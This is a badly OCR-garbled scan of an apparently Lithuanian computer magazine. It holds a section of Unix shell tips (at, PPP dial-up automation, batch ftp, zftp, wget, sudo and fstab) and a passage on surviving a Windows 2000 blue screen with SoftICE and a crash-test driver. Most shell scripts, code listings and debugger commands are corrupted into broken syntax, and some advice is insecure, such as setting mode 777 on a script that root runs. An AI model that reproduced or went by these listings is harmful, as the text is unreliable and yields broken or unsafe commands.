t [S 1= 0 |; then 
dd con=noenor II=/dev/cdiom ol=Sl.img 


| 
) 
+ audio disko perkodavimas į ogą vorbis formatą 
funcion cdogg() ( 
(dporanoia -B 
for wav in track“.wav; do 
Oggenc Swav 
m I Swav 
done 
| 
+ bylos paieško pagal šabloną 
funcion F() ( 
find . Aype f -iname VSIV As ; 
) 
>£ bylos pavadinimo pakeitimas į mažąsias raidės 
undion Icose() ( 
i [S 1= O | then 
mv SI "eo $1 | ir "[upper] [lower:]" 
ti 
] 
> «term antraštės sukonfigūravimas 
fundion xtitle() ( 
it [SA 1= 0 | then 
echo -e „033)0,S1N0077 
ti 
) 
+ darbastalio vaizdo (streenshot) sukūrimas 
Iuncion sshat() ( 
import window root —/saeenshot.png 
) 


[Dėl BSD] 1. BSD sistemos paprastai komplektuojamos su pro- 
grama curl, kuri savo funkcionalumu daug kuo panaši į wget. 

2. ppp demonas, veikiantis vartotojo erdvėje, po susijungimo 
užmezgimo paleidžia bylą /etc/ppp/ppp.linkup. 


Vykdymą galima atidėti bet kuriai dienai, panaudojant tokį formatą: 
„at valanda:minutė /mėnesis/diena/metai“. Dar man patinka 
štai toks laiko nurodymo stilius: „at now + 2 hours“ — įvykdyti 
komandą po 2 valandų, „at now + 1 day2“ — įvykdyti kitą dieną. 
Kaip ir cron, at gali pasirūpinti tuo, kad vartotojas pranešimą apie 
užduoties įvykdymą gautų elektroniniu paštu. Norėdamas pašalinti 


nereikalingą užduotį, peržiūrėk užduočių sąrašą ir įsidemek jos 
identifikatorių (komanda atą), 0 po to įvykdyk „atrm identifika- 
torius“. 


[Interneto susijungimų automatizavimas] Atėjo laikas automa- 
tizuoti tavo skaitlingus interneto susijungimus. Iš karto pasakysiu, 
kad šis skyrius bus naudingas tik besijungiantiems per modemą. 
To priežastys paprastos. Išskirtinių linijų savininkams nereikia nieko 
automatizuoti, susijungimas su globaliuoju tinklu inicializuojamas 
OS krovimosi etape, nedalyvaujant vartotojui. Kita vertus, „laim- 
ingiesiems“ modemų savininkams tenka riboti ne tik internete 
praleistą laiką (dėl kas minutę skaičiuojamo tarifo), bet ir be viso 
kito šį prisijungimą nukelti link nakties (pigiau). Išeitis: priversti 
OS naktį prisiskambinti paslaugos tiekėjui ir pasiimti paštą bei 
reikiamas bylas. Siūlau tau vieną iš galimų sprendimų. Atsidarome 
bylą /etc/ppplip-up ir joje įrašome: 


+ vi /etdppn/ip-up 
/birVsh 
2 išsiunčiam paštą (lik jeigu pas tave įdiegtas lokalus posto serveris) 
Jusi/sbin/sendmail -ą 
2 paleidžiome bylą /imp/ppp-0uto 
if [ -x /imp/ppp-outo |; hen 
/imp/ppp-outo 
44 ištiname jau nereikalingą bylą 
tm /tmp/ppp-auto 
+ atsijungiome 
Just/sbin/ppp-of 


Vietoje /usr/sbin/ppp-off įrašyk komandą, su kuria tu atsijungi 
nuo tinklo. Jeigu pppd demonas suras bylą /tmp/ppp-auto, jis ją 
įvykdys ir nutrauks susijungimą. Dabar sukurkime ppp-auto bylos 
šabloną: 


2 vi —/ppp-0uto 

AVbir/sh 

4 byla vykdoma 100! vardu, 0 mūsų komandos turi būti vykdomos paprasto 
vartotojo vardu 

26 /bin/su — vartotojo vados: 

4 posiimam paštą 

fetchmail 

26 pereiname į specialų katalogą 

cd —/download 

+ pasisiunčiame reikiamas bylos 

wget Ip. 

wgel hitp://... 


3 date 
Coa Or 26 18:11:46 VEVST 2005 

Sat iais 

usrning: commands will be executed using (In order) a) SSNELL D) login shell <) 
Ain/sh 

at echo "Message from AT“ 
a <E0T 

Job 16 at 2005-10-26 18:13 
3 Message Iron AT 

s 


sdeurots/A 


at vykdo mūsų komandą 
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Panaudojant vieną skriptą, galima susijungti su iš karto keliais ftp. 
serveriais. 


Šioi bylai reikia suteikti visos teises: 
$ chimod 777 —/ppp-0uto 


Viskas, dabar tau reikia ją nukopijuoti į katalogą /tmp ir su at 
nurodyti susijungimo laiką: 


$ p —/ppp-uuto /imp/ppp-aulo 
$ a 0210 
at> /usi/sbin/ppp-on 


Jusr/sbin/ppp-on pakeisk į komandą, su kuria tu užmezgi 
susijungimą. Atkreipk dėmesį, kad tokios komandos paprastai 
reikalauja root teisių, todėl tokiu atveju galima: a) sukonfigūruoti 
sudo (žr. žemiau) arba b) at paleisti root vardu. 

Be abejo, toks sprendimas šiek tiek bukas, tačiau labai paprastas. 
Šiuo atveju visą šį sprendimą apsimokėtų papildyti komandos 
įvykdymo rezultatų įrašymu į bylą ir jo išsiuntimu elektroniniu paštu 
su komanda /usr/bin/mail (arba mailx). 


[Nepriprask prie naršyklės] Apie susijungimus išsiaiškinom, dabar 
pakalbėkime apie automatinį bylų siuntimą. Pradžiai pabandykime priv- 
ersti ftp klientą dirbti autonominiu režimu. Šios idėjos realizacijai prireiks 
pažangaus kliento [ftp (jį gali rasti bet kuriame distributyve). Komandų 
vykdymas paketiniu režimu yra viena iš jo ypatybių. Norint pasinaudoti 
šia galimybe, sukurk maždaug tokio turinio bylą —/!ftp.auto: 


S i —Ahpaubo 

>£ nurodome vartotojo vardą ir slaptažodį (tuščios slaptažodis — „“) 
User name passwd 

+ prisijungiame prie: serverio 

ip fip.kemel.og 

7 toliou eina standartinės Ap protokolo komandos(get, put, Is) 
ga 

+ atsijungiame 

eit 


Šiai bylai reikia suteikti teisingas priėjimo teises (kad niekas 
negalėtų pamatyti slaptažodžio): 


$ cdmod 600 —/fip.auto 


Po to poleik Ip su tokia komanda: 
$ lip + —Apavo > —/hploų 


Ftp klientas įvykdys visas tavo komandas ir atsijungs nuo 
serverio. Šiuo atveju serverio atsakymai į perduotas komandas 
bus įrašyti į bylą —/Iftp.log (pagal nutylėjimą viskas išvedama 
į ekraną). Ši byla gali būti labai naudinga, jeigu skripte nau- 
dojama rekursyvaus katalogų perėjimo komanda (Is -R). Pan- 
audojant vieną skriptą, galima susijungti su iš karto keliais ftp 
serveriais. 

Susijungimą su ftp galima padaryti dar autonomiškesnį, jeigu pan- 
audosime zsh praplėtimą, kuris vadinasi zfip. Tai į shellą įmontuotas 
ftp klientas, leidžiantis ftp protokolo komandas integruoti tiesiai į 
skriptus. Norėdami pamatyti šios technologijos galią, peržvelkime 
šį skriptą: 


$ vi —/got komas 
AUbin/zsh 
FAP=Hp.kemel.org 

0 |; then 


zmodhbad zskyzltp 


echo -n „Conneding 10 SFTP.. „ 

Zip open ŠFIP 

Zip login ananymous „“ >/dey/iull 2>81 

Zip binony 

Zip cd pubVlinuykernel/V echo SVER | aut d „I 127 
echo „Checking for new kernel...“ 

Zip Is | grep liux (VERY 


ii I[ 82 == 0 JL to 
echo -n „Downloading... „ 
žip get linu-Š(VER).tor.bz2 > linux-S(VER .tor.b22 
2ip dose 
eke 
echo „Kemel SVER doesn't exist" 
Zip dos 
fi 


Šis skriptas skirtas Linux branduolio parsiuntimui iš oficialaus Ap 
serverio. Jį paleidinėti derėtų su vienu parametru — branduolio 
versija. Galima pastebėti, kad zfip operuoja standartinėmis bet 
kurio ftp kliento komandomis, skirtumas tik tas, kad įvykdžius 
kiekvieną komandą valdymas grąžinamas shellui. Dėl šios ypatybės 
galima pilnai kontroliuoti visą kliento-serverio dialogą, tuo tarpu 
anksčiau tam reikėjo naudoti expect. 

Jeigu tau reikia parsisiųsti bylas iš http serverio, galima pasinaudoti 
neinteraktyviu http klientu wget. Aš jį naudoju su autonominiais in- 
terneto susijungimais, kaip buvo parodyta ankstesniame skyrelyje. 


$ get URL 


Byla bus parsiųsta į einamą 
katalogą. Tu gali susidurti su tokia 
situacija, kuomet byla yra labai 
didelė ir negali būti parsiųsta vieno 
prisijungimo metu. Ką tuomet 
daryti? Jeigu didžioji bylos dalis 
jau parsiųsta, o laikas spaudžia, 
tuomet wget galima arba nudobti 
su komanda „killall wget“, arba su 
klavišų kombinacija „Ctrl+-C“. Kitą 
kartą prisijungus siuntimo procesą 
reikia atnaujinti (jeigu serveris 
pripažįsta resume režimą — red. 
past.) su komanda: 


$ wget < URL 


Dar wget galima paversti tikru 


web robotu, kuris pagal tavo pageidavimą gali parsiųsti kad 
ir visą svetainę. Tam panaudok vėliavėlę -r, kuri liepia wget 
rekursyviai sekti visas nuorodas ir siųsti visus puslapius, kurie 
logiškai yra žemiau nurodyto URL. Kad wget neprisiųstų visokio 
giliai svetainės gelmėse paslėpto šlamšto, pasinaudok opcija 
„1 skaičius“, kas nurodo maksimalų rekursijos gylį. Wget taip 
pat numatyta vėliavėlė -m, kuri yra šių opcijų sinonimas: -r , 
-N (siųsti tik tas bylas, kurios buvo atnaujintos nuo paskutinio 
siuntimo laiko), -/ inf (begalinė rekursija), -nr (išsaugoti ftp 
klientų generuojamas „listing bylas). Vėliavėlės -m paskirtis 
— sukurti tikslų svetainės veidrodį (mirror). 


[Nepiktnaudžiauk pele] Karštieji langų menedžerių arba progra- 
mos screen klavišai — dar vienas efektyvus būdas, kaip padidinti 
tavo našumą. Visi šiuolaikiniai langų valdymo įrankiai vartotojui 
suteikia galimybę konfigūruoti karštųjų klavišų kombinacijas ir 
Joms priskirti tam tikrų programų paleidimą. Pavyzdžiui, terminalo 
emuliatoriaus (xterm, rxwvt, kterm) paleidimą galima „pakabinti“ 
ant kombinacijos <Alt+T>, tuomet daugiau nesikankinsi su 
meniu naršymais ir pelės spaudymais ant ikonėlių. Taip pat 
siūlyčiau karštosioms kombinacijoms priskirti darbo su langais 
funkcijas (ypač išdidinimui per visą ekraną ir uždarymui) — tai 
labai patogu, Beje, siauruose rateliuose žinomas „gykams skirtas 
landų menedžeris“ /on visiškai valdomas klaviatūra. 


ĮNaudokis automatiniu paleidimu] Veikiausiai pas tave yra 
tokių programų, kurias norėtumei paleidinėti kaskart kraunantis 
operacinei sistemai, prisijungus vartotojui arba paleidus X'us. Tam 
galima panaudoti tris bylas: 

1. /eto/ro.d/rc.local (yra daugelyje Linux distributyvų). Šis shell 
skriptas vykdomas su root teisėmis paskutinėje krovimosi stadijoje. 
Čia galima įrašyti rezoliucijos ir konsolės parametrų (fbset ir set- 
term) pakeitimo komandas bei paleisti tuos demonus, kurie neturi 
atitinkamų inicializacijos skriptų. 

2. -/.bashrc, —/.zshre, —/.cshrc (priklausomai nuo naudojamo 
shello). Paleidžiama kiekvieną kartą jungiantis vartotojui. 

3. —/xinitre (arba —/.xsession, jeigu Xai paleidžiami automatiškai). 


119 opan Hto.Nernel EE 
1 žito login a Mi | head 
Nelcome 10 the 


LIN KERNEL ARCNIVĖS 
Vo,kernel org 


"Much sore than Just kernelis 


IF VOU'RE ACCESSING THIS S1TE VIA A KEG GRONSER 
PLEASE USE TWE MTTP URL BELOW INSTE4O! 


E 4036 Oct 2 
6 145777 Jun OT 2004 Is-18,bzž 
536 248 Jun 07 2004 Is-i4b22,s14n 
6 1552613 Jun 07 Ž00s Is-1K 42 

EĄ 248 Jun 07 2004 Is-1A.87.51gn 
6 246 Jun 07 2004 Is-14,siin 
1 4036 Sep 26 00:14 stm 

6 4096 Nov 05 2003 site 


4036 Ar 17 2005 softuare 


Šioje byloje aprašytas koman- 
das paleidimo metu vykdo 
X-serveris. Čia galima surašyti 
įvairias programas paleidžiančias 
komandas, pavyzdžiui: 


S vi —/Ainite 

4 paleidžiame terminolo  emuliatorių, 
gkellm ir Aubox 

M 

gkidlm 8 


mano /etc/rc.d/rc.local 


ec Iluvbox 


[Dar keletas žodžių apie „cron“ ] 1. Nepaisant to, kad cron 
crontab bylas moka skaityti iš bet kurio katalogo, standartinė jų 
saugojimo vieta yra /var/spool/cron/crontabs. 

2. Daugelyje sistemų naudojamas Vixie Cron, kuris pasirūpins tuo, 
kad užduotis būtų įvykdyta, net jeigu nurodytu laiku tai padaryti 
buvo neįmanoma (pavyzdžiui, mašina buvo išjungta). 


[Atsikratyk priklausomybės nuo „root“| Tau tikriausiai kartais 
tenka susidurti su problema, kuomet tau vykdant kai kurias ko- 
mandas neužtenka paprasto vartotojo teisių. Ką daryti tokiu atveju? 
Įprastinėmis sąlygomis norint įvykdyti reikiamą komandą geriausias 
sprendimas būtų pasinaudoti /bin/su su raktu -c. Tačiau jeigu su 
iškvietimą įkelsi į skriptą, jis tiesiog apmirs laukdamas slaptažodžio. 
Norint apeiti šią problemą, galima naudoti /usr/bin/sudo, kurį galima 
sukonfigūruoti taip, kad jis nereikalautų rankinio slaptažodžio 
įvedimo. Kitame listinge parodytas sudo konfigūracijos pavyzdys, 
leidžiantis vartotojui unixoid vykdyti šias komandas: /sbin/halt, 
/sbin/reboot, /usrIsbin/ppp-on ir /usr/sbin/ppp-off. 


* visudo 

+ nurodome lokalaus kompiuterio vardą 

Host Alios LOCAL = locolhus! 

4 apibiėžiam teikiamų komandų trunpinius: (pseudonimus) 

Cmnd Alias HALT = /sbin/halt, /sbin/reboot 

(mnd Alias PPP = /et/ppy/ppp-on, /eiV/ppp/ppp-olf 

+ leidžiame vartotojui unixoid (nereikalaujant root slaptažodžio) lokaliame kompiuteryje 
vykdyti aukščiau išvardintas komandos 

unixoid LOCAL = NOPASSWD: HALT, PPP 


[Nemontuok rankomis] Įsivaizduok situaciją: pas tave ateina 
draugas su flash kortele, tu ją prijungį ir, norėdamas prieiti prie 
joje saugomų bylų, surenki štai tokią komandą (kurią būtina vykdyti 
root vardu): 


> mount <! Vat /dev/sdal /mt/ilosh 


Arne per daug, kaip vienai mažai atminties kortelei? :) O juk tai pats 
trumpiausias variantas. Ne, taip nieko nebus. Geriau iš karto į /etc/fstab 
pridėkime eilutę „/dev/sda1 /mnt/fash vfat user,umask=000,showexec 
00“. Dabaratsukime juostą atgal: ... ateina draugas su flash kortele, 
tują įdedi į kompiuterį, o priėjimą prie duomenų gauni su štai tokia 
komanda (root teisės jau nebereikalingos): 


$ mount /mnt/fash 


Štai ir viskas! 
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Gyvenimas po BSOD 

Kaip su derintuvu ir asembleriu 
priversti sistemą išgyventi mėlynąjį 
mirties ekraną 2 

VISI PUIKIAI ŽINO, KĄ REIŠKIA BSOD 
(BLUE SCREEN OF DEATH). TAI 
PASKUTINIS OPERACINĖS SISTEMOS 
ATODŪSIS, PO KURIO JI NUSIDUMPINA 
IR PERSIKRAUNA, PRARASDAMA VISUS 
NEIŠSAUGOTUS DUOMENIS. TAČIAU IŠ 
TIKRŲJŲ BSOD — TAI DAR NE PABAIGA, 
IR JEIGU PERKROVIMĄ PAKEISTUM RE- 
ANIMAVIMU, 9 ATVEJAIS IŠ 10 GALIMA 
SUGRĮŽTI Į NORMALŲ REŽIMĄ IR SUSPĖTI 
ISJUNGTI SISTEMĄ PRIES TAI, KOL JI GA- 
LUTINAI PAKRATYS KANOPYTES.. 


Mėlynasis ekranas pasirodo kiekvieną karta, kai branduolys 
sužadina neapdorojamą išimtį (exception; pavyzdžiui, kreipimasis 
į nulinę rodyklę) arba pagauna akivaizdžiai neteisingą operaciją 
(pavyzdžiui, jau atlaisvintos atminties atlaisvinimą).. Visais šiais 
atvejais valdymas yra perduodamas funkcijai KeBugCheckEx, 
kurios aprašymą galima rasti NT DDK. Ji užbaigia sistemos 
darbą avariniu režimu, jei būtina — padaro atminties turinio 
kopiją (dump), kurioje pasirausus galima nustatyti sutrikimo 
priežastį. 

Funkcijai KeBugCheckEx perduodami keturi argumentai, svarbiau- 
sias kurių yra BugCheckCode, nurodantis sutrikimo priežastį. Iš viso 
egzistuoja daugiau nei šimtas klaidų kodų, kurie dokumentuoti DDK 
(gali rasti derintuvo dokumentacijoje Using Microsoft Debugger), 
tačiau iš tiesų jų kur kas daugiau. W2K SP2 branduolio disasem- 
bliavimas parodo, kad KeBugCheckEx iškviečiama 387 vietose (su 
skirtingais parametrais). 

Savaime suprantama, klaidų fatališkumas nėra vienodas. 
Daugiabranduolinėse operacinėse sistemose tai iš viso nėra 
problema, kur vieno branduolio nulūžimas neturi įtakos kitiems. 
Visi branduoliai veikia atskirose adresų erdvėse ir yra dalinai 
arba pilnai vienas nuo kito izoliuoti. Nugriauti tokią sistemą 
labai sunku, daugiabranduolinė architektūra ypač atspari sutriki- 
mams, tačiau... kaip ji stabdo! Tarpbranduolinis komunikavimas 
suėda daugybę procesoriaus laiko. Jeigu visus komponentus 
sukimštume į vieną branduolį, gautume monolitinį Linux tipo 
branduolį (kas, beje, iš daugelio teoretikų pusės buvo aršios 
pastarojo kritikos priežastimi). Linux sistemoje (kaip ir BSD) visi 
branduolio komponentai, kurie čia vadinami moduliais, vykdomi 
vienoje adresų erdvėje, dėl ko nekorektiškai parašytas modulis 
gali nesąmoningai arba tyčia pasikėsinti į svetimą nuosavybę, 
po ko duomenys gali sėkmingai pavirsti mišraine. Tai faktas! 
Tačiau kai branduolyje susidaro neapdorojama išimtis, Linux 
pribaigia tik tą modulį, kuris ir sukėlė šią išimtį, likusieji lieka 
nepaliesti. Avariniu būdu sistema stabdoma tik dėl rimtos 
priežasties, kuomet nulūžta koks nors esminis komponentas, 
dėl kurio tolimesnis branduolio veikimas tampa neįmanomas, 
Žinoma, jeigu nulūžo kietojo disko tvarkyklė, tai viskas baigiasi 
tragiškai, tačiau, pavyzdžiui, be garso plokštės tvarkyklės kurį 
laiką galima ir apseiti — užtektų išsaugoti reikiamus duomenis 
ir tik tada persikrauti. 

NT šeimos operacinės sistemos naudoja hibridinę architektūrą, 
kuri suderina stiprias monolitinių ir mikrobranduolių puses, kas 
teoriškai turėtų užtikrinti pirmenybę prieš monolitinį Linux'a (beje, 
eksperimentinis branduolys GNU/HURD kaip tik ir sukurtas remiantis 
mikrobranduoline architektūra). Legendiškai stabilią NT/XR kurią, kaip 
sakoma, galima nulaužti tik kartu su visu serveriu, iš tiesų panardinti 
į mėlynąjį ekraną labai lengva. Pakanka bet kuriai tvarkyklėi padaryti 
ką nors neleistino, kaip visa sistema automatiškai katapultuoja 
vartotoją. Gerai, kad „Microsoft“ nestato avialainerių! 

Jeigu būtų galima pereiti prie HURD! Tačiau, deja, suderinamumas 
to neleidžia. Įsikirto dantimis ir nepaleidžia! Toli gražu ne kiekvienas 
gali neskausmingai atsisakyti mylimosios NT. Taigi nesiskųskime dėl 
neišvengiamo likimo, o geriau čiupkime asemblerį ir pabandykime 
ką nors padaryti. Ką nors, kas išspręstų visas mūsų problemas 
(užkasti Bilą Geitsą 640 kilobaitų žemiau asfalto — nesiūlyti) 


[Kuo mes užsiiminėsim] Avariniu būdu užbaigti sistemos darba, 
išspjovus mėlynąjį ekraną — paprasčiausias dalykas, kurį galima 
padaryti lūžus sistemai. „Microsoft“ ne šiaip sau pasuko mažiausio 


Didelę mėlynųjų ekranų 
kolekciją gaima rast) adresu 
hito: //uwwdognoodle9S. 
cjb.net/bsodi. 
peržiūrėjus pasidaro labai 


pasipriešinimo kryptimi. Na, 
o mes parodysime, kaip išeiti 
iš mėlynojo ekrano į normalų 
režimą, kad suspėtum išsaugoti 


liūdna... Taip Uūdna, kad į 
net nešinos gyvent, neri Visus duomenis prieš jai galuti- 
po BSOD. nai nulūžtant. Tai gana rizikingas 


triukas. Nesėkmės atveju mes 
galime prarasti viską, net ir mūsų 
disko particiją, kurią po to tektų 
labai ilgai atstatinėti. 

Iš pradžių mes pademonstru- 
osime mėlynojo ekrano įveikimo 
techniką, 0 po to parašysime 
specialią tvarkyklę, kuri tai darys 
automatiškai. 


Kartais SohICE sustoja ne 
ties pina išimties apdora: 
tojo komanda, o tiesiag 
pačioje sutrikimo vietoje. 
Su VMWare SoftiCE 2.6 
pirmą kartą visada sustoja 
apaorotuve, O Wsals Kitas 
atvėjais — 91 
Šis efektas 
Viva pėrieiaimo. 


[Ko mums prireiks] Visus eksperimentus mes atlikinėsime su 
skaisčia Windows 2000 be įdiegtų atnaujinimo paketų (likusios 
sistemos elgiasi lygiai taip pat, skiriasi tik adresai). Kad netyčia 
nepražudytume pagrindinės sistemos, visą darbą geriau atlikinėti 
su VMWare stiliaus emuliatoriumi, nors tai ir nėra būtina. 

Taip pat mums prireiks Soft/CE, NT DDK (čia tau padės eMule) ir 
Sveno Šraiberio įrankių rinkinio iš jo knygos „Nedokumentuotos 
Windows 2000 galimybės“, kurį galima nemokamai parsisiųsti iš 
čia: http://irazin.ru/Downloads/BookSamples/Schreiber.zip. Alus ir 
traškučiai — tavo nuožiūra. 


[Mėlynojo ekrano įveikimas su „Softlce“] Sulaukę Windows 
2000 užsikrovimo pabaigos, mes paleidžiame iš Šraiberio 
pasiskolintą tvarkyklę w2k kill.sys, kuri specialiai suprojek- 
tuota taip, kad iškviestų mėlynąjį ekraną. Savaime suprantama, 
tvarkyklės iš komandinės eilutės taip paprastai nepaleisi! Be 
užkrovėjo čia neapsieiti (be abejo, tvarkyklę galima įrašyti į sis- 
temos registrą, tačiau tuomet sistema lūš kiekvieno paleidimo 
metu, kas šiaip jau neįeina į mūsų planus). Mes pasinaudosime 
dinaminiu užkrovikliu w2k Ioad.exe, kurį sukūrė tas pats 
Šraiberis. NT galimas dinaminis tvarkyklių užkrovimas, tačiau 
tam paruošto įrankio standartiniame sistemos įrankių rinkinyje 
nerasi — viskas „Microsoft“ stiliumi, o Linux'e su tuo nekyla 
jokių nesklandumų. 

Komandineje eilutėje surenkame „w2k Ioad.exe W2k kill.sys“, 
po ko sistema sėkmingai pakrato sandalus ir parodo mėlynąjį 
ekraną. 

Taip nutinka dėl to, kad tvarkyklės-žudikės inicializacijos procese 
vykdomas kodas, kuris kreipiasi į nulinę atminties ląstelę, kas yra 
griežtai draudžiama: 

Tvarkyklės-žudikės fragmentas, kuri branduolio režime pagal nulinę 
rodyklę bando nuskaityti dvigubą žodį 


NISTATUS Driverėntry (PDRIVER OBJECT pDriverObjed, 
PUNICODE STRING pusRegistryPath) 


tetun "((NISTATUS *) 0); 


Na, ir kam gi dėl tokių niekų reikėjo laužti visą sistemą?! Kam realiai 
trukdo mūsų baisioji žudikė?! Juk sistemos vientisumas nė kiek 
nenukentėjo! Kaip šitai bukai NT paaiškinti, kad Bagdade viskas 
ramu? Laikas būtų grįžti į user mode ir dirbti toliau. 


Jeigu prieš šį nulūžimą buvo paleistas Soft/CE, tuomet jis perims 
šią išimtį ir parodys savo ekraną, taip mums perduodamas visus 
pataisymui reikalingus duomenis. 

Jeigu nuspaustumei „X“ (arba Ctrl+-D), tuomet vos išėjus iš Soft/CE 
pasirodys mėlynas ekranas, tada taisyti jau nebus ką. Vis dėlto kol 
mes esame derintuve, tol dar galima ką nors padaryti. O padaryti 
galima štai ką: 

1. Nustatyti sutrikimo vieta (kreipimasis į nulinę rodyklę), ištaisyti 
situaciją (sukurti galiojančią rodyklę) ir rankiniu būdu išeiti iš išimties 
apdorotuvo, į pradinę vietą grąžinant CS:EIP Šis būdas geras, tačiau, 
deja, jis reikalauja tam tikro intelekto, kurio mašina, gaila, neturi. 

2. Užciklinti einamą srautą, į laisvą vietą įterpti įmp $ ir išeiti iš 
derintuvo, su komanda r fI=I leidžiant pertraukimus (jeigu jie 
netyčia uždrausti). Viskas siaubingai stabdys, tačiau operacinė 
sistema toliau veiks, ir mes bent jau galėsime korektiškai užbaigti 
jos darbą. 

3. Sulaukti funkcijos KeBugCheckEx iškvietimo ir iš karto iš jos 
išeiti, taip ignoruojant sutrikimą ir pratęsiant normalų sistemos 
veikimą. Tiesa, mes neturime jokių garantijų, kad sistema nenuluš 
galutinai. 

4. Mano kolegos ms-rem pasiūlytas būdas laukinis, tačiau kartais 
veikiantis: perduoti komandas r eip=O0/r cs=1B, kurios perjungia 
procesorių į taikomąjį režimą. 

Kitaip tariant, variantų daug. Iš pradžių pabandykime pasinaudoti 
pirmuoju iš jų. Mes žinome, kad šiuo atveju avarija nutiko dėl priėjimo 
pažeidimo klaidos. Iš to išplaukia, kad procesorius sužadino išimtį, 
į steko viršūnę įmetė EIP/CS/FLAGS ir perdavė valdymą išimčių 
apdorotuvui, kurio viduje mes dabar ir esame. Sukomanduojame 
„d esp“, kas atvaizduoja steko turinį, ir štai ką matome (kad būtų 
patogiau, rekomenduoju išvesto turinio langą perjungti į dvigubų 
žodžių režimą, kas daroma su komanda „dd“): 


a ep 

0010:57443C88 BE67C000 00000008 00200202 804A4431 4. 101 
0010:57443C98 81116A00 86490000 BESF10O8 BEBF1DOS |....L 
0010:57443CA8 81480020 F7443034 745FFFFF 83M9E60 H4-D.. V 


Išimtį sužadinusios instrukcijos adresas yra pirmame dvigu- 
bame žodyje — BE67C000h (pas tave ši reikšmė greičiausiai 
bus kita). CS selektorius eina iš paskos. Jis turi būti lygus 
08h. Trečias dvigubas žodis saugo vėliavėlių registro EFLAGS 
turinį. 

Dabar mes žinome sutrikimo vietą ir galime į ekraną išvesti 
disasembliuotą listingą. Čia mums pagelbės komanda „u *esp“ 
(disasembliuoti atminties turinį adresu, kuris yra registre esp) arba 
„u be67c000“: 

Realios sutrikimo vietos nustatymas 


u "657 

0023:8E67C000 MOV EAX[00000000] 
0023:8E67C005 RET 0008 
0023:8E67C008 NOP 

0023:8E67C009 NOP 

0023:8E67C00A NOP 

0023:8E67C008  NOP 


Štai ji, sutrikimą sukėlusi instrukcija! Pabandykime ją peršokti, 
pratęsdami vykdymą nuo RET 08h. Pasakyta — padaryta. Tačiau 
iš pradžių reikia išeiti iš išimčių apdorotuvo. Tam Soft/CE reikia 
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šisas mėlynųjų mirties ekranų sodas 


įvykdyti šias komandas: 
1) r ep = tesp + sizeo(mov e0x]0]); // nukeipiame EIP registą į RET 
t 6 = "sp + 4); // sulomuojome selektaių (S (nebūtinci) 

2rR b Ižiame pertraukimus 

"ET iš steko išimame 3 dvigubus žodžius 


+ ( 


5) x // išeiname iš derintuvo 


Įvykdžius šią magišką komandų seką, sistema normaliai pratęs savo 
veikimą, mėlynas langas jau nebepasirodys. Fantastika! Neįtikėtina! 
Mes ką tik išvengėme žlugimo, kuris atrodė esąs neišvengiamas! 
Vienas mažytis niuansas. Mano (veikiausiai ir tavo) SoftlCE 
versija nemoka išimčių apdorotuve atstatyti ESP registro. Derin- 
tuvas ignoruoja komandą „r esp=esp +C“ tiesiog imituodamas 
jos vykdymą! O tai reiškia, kad stekas lieka nesubalansuotas ir, 


Microsoft“ avialaineris 


nepaisant visų medikų pastangų, sistema vis dėlto nulūžta. Tenka 
gudrauti. Mes matome, kad už RET 08h eina ilga NOP'ų grandinė. 
Oka, jeigu mes čia įterptume komandą „ADD ESPOCh“, kad steką 
subalansuotų pats procesorius? 

Sukomanduojame derintuvui „A BE67C008“ (asembliuoti praded- 
antadresu BE67C008) irįvedame štai ką: ADD ESROC<Enter>JMP 
BE67C005<Enter> ir dar vienas <Enter>, skirtas įvedimui 
užbaigti. Iš naujo nukreipiame EIP į mūsų pataisymo pradžią (r 
eip = BE67C008) ir išeiname iš SoftICE. Šį kartą mums viskas 
gaunasi! 

Štai sistemos reanimacijai skirtų komandų seka. Primenu, kad ji 
panaudojama tik šiuo konkrečiu atveju: 

Sistemos reanimacija artimomis kovinėms sąlygomis 


u "ep 

1 ep 

1 eip 3 

0 eip 

add sp k 

įnp BE67C005h ; tavo otvejų komandos RET 8 odresas bus kitos 
NIER 


(1=I 
x 


Trečiąjį kartą derintuvas nebepasirodo. Pelė šiek tiek stabdo, tačiau 
su ja kuo puikiausiai įmanoma dirbti 


ĮAutomatizuojame mūsų darbą] Ką tik aprašytas rankinio at 
statymo būdas gerai dera su sisteminiais programuotojais, kurie 
nuolatyra atsidarę SoftICE, o registrais moka fechtuotis kaip rapyra. 
Tik štai paprastas vartotojas greičiau numirs, nei užsiiminės tokiu 
mazochizmu. Tačiau kodėl gi mums neparašius tokiems vartoto- 
jams skirto įrankio, kuris užeiklintų klaidą sugeneravusį srautą arba 
susidorotų su KeBugCheckEx? 

Parašyti tokį daiktą nėra sudėtinga (ir mes tai iš tesų padarysim), 
tačiau tai tas pats, kas | avarinį vožtuvą sukišti 
pliauską. Jeigu jau sistema ruošiasi susidraskyti 
į gabalus, jos jau niekas nesustabdys. Dėl 
to gali nukentėti net failų sistema (tegu tai 
bus net ir NTFS). Be abejo, tokios tragedijos 
tikimybė labai menka, tačiau vis dėlto įmanoma 
— turėk tai omeny. Nepaisant to, surizikuoti 
verta, ypač tais atvejais, kuomet tu esi tikras, 
kad tai galima padaryti 

Pavyzdžiui, pas mane kartą iškilo konfliktas 
tarp kreivai parašytos DSL modemo tvarkyklės 
ir vaizdo plokštės tvarkyklės, dėl ko peržiūrint 
filmus kartais pasirodydavo BSOD. Kadangi 
normalių tvarkyklių surasti nepavyko, aš laikinai 
apsiribojau tuo, kad užtrumpinau KeBugCheckEx 
su JMP komanda, ir — nepatikėsi — pas mane 
tai prigijo! 

Atlikime tokį eksperimentą. Nuspauskim 
Ctrl+D ir taip iškvieskim SoftICE, sukurkim sus- 
tojimo tašką ties KeBugCheckEx ir paleiskim 
mūsų tvarkyklę-žudikę. Beje, sustojimo taškas 
būtinai turi būti aparatinis („bpm KeBug- 
CheckEx X*), o ne programinis („bpx KeBug: 


CheckEx“"), priešingu atveju nieko nesigaus. 

Šį kartą vietoje priėjimo prie neleistino puslapio klaidos pranešimo 
suveikus sustojimo taškui išplaukia Soft/CE, kurio kursorius rodo 
pirmąją KeBugCheckEx funkcijos komandą, mūsų atveju esančią 
adresu 8042BF14h. 

Disasemblerio lange eidami žemyn surandame pirmąją instrukciją 
„RET 14h“ (mūsų atveju ji įsikūrusi adresu 8042C1E9h). Tai ir yra 
išėjimo iš funkcijos komanda, į kurią reikėtų padaryti įmp. Norint 
greitai surasti šią vietą, galima Soft/CE paprašyti atlikti paiešką („S 
eip |-1 C2,14,00*). 

Derintuvui sukomanduojame „r eip = 8042C1E9“ (pas tave 
greičiausiai bus kitas adresas) ir spaudžiame Ctrl+D (išeinam). 
Derintuvas vėl išplaukia toje pačioje funkcijoje. Mums nieko 
